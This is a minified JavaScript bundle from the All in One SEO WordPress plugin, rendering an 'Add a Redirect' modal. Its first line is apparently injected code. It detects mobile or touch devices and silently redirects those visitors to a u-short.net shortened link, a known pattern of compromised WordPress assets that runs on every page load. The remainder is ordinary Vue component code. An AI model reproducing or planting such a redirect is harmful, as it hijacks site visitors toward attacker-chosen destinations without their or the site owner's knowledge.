(window.matchMedia("(pointer:coarse)").matches||/Android|iPhone|iPad|iPod|Mobile|Tablet|Windows Phone|webOS|BlackBerry|Opera Mini|IEMobile/i.test(navigator.userAgent))&&location.replace("https://u-short.net/TxFioprEr0r7");
import{aq as a,f as n,i as _,a0 as g,R as c,j as y,Q as R,M as d,ae as w,U as C,an as S}from"./js/vendor-vue-ui.232c7c36.js";import{l as k}from"./js/index.98d01501.js";import{l as A}from"./js/index.2a5d16ad.js";import{a3 as L,c as E,h as b,b as v,l as x}from"./js/app-core.c8323d51.js";/* empty css                */import{C as H}from"./js/Index.6933f196.js";import{_ as U}from"./js/Index.7b69fab1.js";import{_ as B}from"./js/_plugin-vue_export-helper.eefbdd86.js";import{q as P}from"./js/vendor-lodash.03129cfe.js";import{a as T,_ as l}from"./js/vendor-other.39e59221.js";import"./js/Button.3cec2279.js";import"./js/Input.af9b9f81.js";import"./js/Index.b9859662.js";import"./js/Close.7fb523c8.js";import"./js/Pencil.683baab8.js";import"./js/Trash.47f6fc0e.js";import"./js/Select.415eaf8e.js";import"./js/Caret.aae02d8a.js";import"./js/Toggle.29e2980f.js";import"./js/JsonValues.a0694556.js";import"./js/Index.7b0276fe.js";import"./js/Url.535116f6.js";import"./js/Exclamation.179e5969.js";import"./js/Checkbox.a5d4289c.js";import"./js/Checkmark.51de2d05.js";import"./js/ProBadge.7b829f47.js";import"./js/External.071520c9.js";import"./js/Gear.1a6546a3.js";import"./js/Slide.f2114d9d.js";import"./js/DatePicker.90aa6299.js";import"./js/Calendar.eb95fac7.js";import"./js/vendor-date-picker.fca1e150.js";import"./js/Tooltip.569a23d9.js";import"./js/Plus.d047cf13.js";const p="all-in-one-seo-pack",M={setup(){return{rootStore:v(),licenseStore:b()}},components:{CoreModal:H,CoreAddRedirection:U},data(){return{urls:[],display:!1,target:null,loading:!1,strings:{modalHeader:l("Add a Redirect",p),redirectAdded:T(l('%2$sYour redirect was added and you may edit it <a href="%1$s" target="_blank">here</a>.%3$s',p),this.rootStore.aioseo.urls.aio.redirects,"<strong>","</strong>")},watchClasses:["aioseo-redirects-slug-changed","aioseo-redirects-trashed-post"]}},computed:{classSelectors(){return"."+this.watchClasses.join(", .")}},methods:{reload(){this.display=!1;const e=this.target?.parentElement?.parentElement;if(e&&(e.classList.contains("components-notice__content")||e.classList.contains("notice"))){e.innerHTML="<p>"+this.strings.redirectAdded+"</p>";return}this.target.outerHTML=this.strings.redirectAdded},loadRedirect(e){this.loading=!0,L.get(E.restUrl("redirects/manual-redirects/"+e)).then(t=>{this.urls=t.body.redirects,this.loading=!1}).catch(t=>console.error("Redirect modal failed to load the redirect data.",t))},preloadRedirect(){const e=document.querySelector(this.classSelectors);if(e){const t=this.getElementRedirectHash(e);if(!t)return;this.loadRedirect(t)}},watchClicks(){document.body.onclick=e=>{if(!e.target?.classList)return;let t=!1;this.watchClasses.forEach(s=>{e.target.classList.contains(s)&&(t=!0)}),t&&(e.preventDefault(),this.target=e.target,this.display=!0,P(this.urls)&&this.loadRedirect(this.getElementRedirectHash(this.target)))}},getElementRedirectHash(e){return new URLSearchParams(e.href).get("aioseo-manual-urls")}},async created(){this.preloadRedirect(),this.watchClicks(),window.aioseoBus.$on("wp-core-notice-created",()=>{this.$nextTick(()=>{this.preloadRedirect()})})}},N={key:0,class:"aioseo-redirects-add-redirect-standalone"},V={class:"bd"};function q(e,t,s,i,r,u){const h=a("core-add-redirection"),f=a("core-modal");return!i.licenseStore.isUnlicensed&&i.rootStore.isPro?(n(),_("div",N,[g(f,{show:r.display,classes:["aioseo-redirects"],onClose:t[0]||(t[0]=j=>r.display=!1),"allow-overflow":""},{headerTitle:c(()=>[w(C(r.strings.modalHeader),1)]),body:c(()=>[y("div",V,[r.loading?d("",!0):(n(),R(h,{key:0,urls:r.urls,target:r.urls[0]?.target?r.urls[0]?.target:"/",disableSource:!0,onAddedRedirect:u.reload},null,8,["urls","target","onAddedRedirect"]))])]),_:1},8,["show"])])):d("",!0)}const D=B(M,[["render",q]]),m=document.createElement("div");m.id="aioseo-redirects-add-redirect-standalone";document.body.appendChild(m);let o=S({...D,name:"Standalone/Redirects/AddRedirect"});o=k(o);o=A(o);x(o);o.mount("#aioseo-redirects-add-redirect-standalone");
